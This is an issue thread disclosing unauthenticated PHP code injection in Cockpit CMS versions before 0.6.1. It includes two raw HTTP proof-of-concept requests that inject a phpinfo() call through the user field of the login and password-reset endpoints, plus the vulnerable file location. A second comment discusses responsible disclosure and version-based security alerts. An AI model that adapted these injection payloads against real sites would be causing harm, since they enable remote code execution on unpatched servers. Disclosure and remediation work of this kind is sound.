PHP Code Injection in versions < 0.6.1

[waid-br]

Hello! I was using an outdated version of the CMS and found multiple code injection vulnerabilities.

This works for unauthenticated users that try to login or recover an user password.

PoC 1 - Usual request/response

PoC 1 - PoC request

  POST /auth/check HTTP/1.1   Host: example.com   User-Agent: Mozilla/5.0   Content-Type: application/json; charset=UTF-8   Content-Length: 52   Origin: https://example.com

  {"auth":{"user":"test'.phpinfo().'","password":"b"}}  

PoC 1 - PoC request/response

PoC 2 - Usual request/response

PoC 2 - Raw request

  POST /auth/requestreset HTTP/1.1   Host: example.com   User-Agent: Mozilla/5.0   Content-Type: application/json; charset=UTF-8   Content-Length: 52   Origin: https://example.com

  {"user":"test'.phpinfo().'"}  

PoC 2 - PoC request/response

It was an issue found on /var/www/html/lib/MongoLite/Database.php(107) and seems already fixed by escaping special chars from the string.

Can I register this as a CVE? Maybe this can help users that still use the outdated version.

[laphilipa]

@RResende2 Thanks for pointing this out. I use cockpit myself and was a bit shocked finding a way to hack it explaind in a way that every scritp kit coudld do it right on the projects repo. There must be a better way to handle problems like this. Do you think querying recent CVEs for cockpit and comparing them with the current version that is running coul help to alert users running insecure versions? Sort of what Jenkins has with the build in securitiy warning feature. Apart from that maybe an official way for responsible disclosure of the bug.